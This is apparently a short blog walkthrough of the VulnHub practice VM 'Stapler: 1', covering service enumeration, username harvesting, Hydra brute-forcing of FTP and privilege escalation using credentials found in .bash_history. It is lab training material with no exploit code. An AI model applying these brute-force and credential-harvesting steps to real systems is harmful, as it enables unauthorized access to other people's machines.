STAPLER: 1 Walkthrough

https://www.vulnhub.com/entry/stapler-1,150/

+ Average beginner/intermediate VM, only a few twists   | 
|   + May find it easy/hard (depends on YOUR background)  | 
|   + ...also which way you attack the box

https://www.vulnhub.com/entry/stapler-1,150/

“know yourself and you will win all battles”
Sun Tzu


Enumeration

Let’s use NMAP to enumerate.

Brooding:🤔

This machine has many services running. First thing is to rule out the unnecessary services.

Ruling out ports

  1. Port 666 sent out a zip file having an image.

📌 username: scott

2. Port 20 — Nothing here.

3. Port 22 — No available exploits.

4. Port 53 — Found nothing on DNS — all the available exploits are DOS.

5. Port 3306 — There is not remote exploit and no default pwd.

More Enumeration 🤓…

  1. port 21

📌 username:harry

Found a note on this FTP.

📌username:elly

📌username:john

2. port 80

  • There is no trial on manual walk + source code view + robots.txt
  • Nikto scan
.bashrc & .profile

Nothing on .bashrc and .profile

🔑 It says that it web server might be mounting a user directory. 🤔

  • Gobuster — Nothing here.

3. port 12380

  • manual walk + source code view + robots.txt

📌 username:zoe

User-agent: *
Disallow: /admin112233/
Disallow: /blogblog/

  • Nikto scan
  • Gobuster

Found a blog:

https://192.168.103.171:12380/blogblog/

whatweb https://192.168.103.171:12380/blogblog/

Apache[2.4.18], Bootstrap[20120205,4.2.1], Country[RESERVED][ZZ], HTML5, HTTPServer[Ubuntu Linux][Apache/2.4.18 (Ubuntu)], IP[192.168.103.171], JQuery, MetaGenerator[WordPress 4.2.1], PoweredBy[WordPress,WordPress,], Script[text/javascript], Title[Initech | Office Life], UncommonHeaders[dave], WordPress[4.2.1], x-pingback[https://192.168.103.171:12380/blogblog/xmlrpc.php]

Nothing vulnerable on wordpress.

4. port 139

Found few shared folders.

  • Got a wordpress backup — kathy
  • Got todo file — kathy

📌 username:kathy

Got users through Enum4Lin script.

Let’s try these users on the services…

  1. ftp
  2. ssh
  3. wordpress

Finding POI(Point Of Intrusion)

Use the usernames to brute-force since we have no other way to get in for now.

ftp — Hydra

No luck on other services.


Exploitation

Got a low privilege User.

Privilege Escalation

After looking into the .bash_history file🤓, got the credentials for other 2 accounts. one of the account has all the priv.

peter has all the root priv.
ssh into peter.

Photo by bruce mars on Unsplash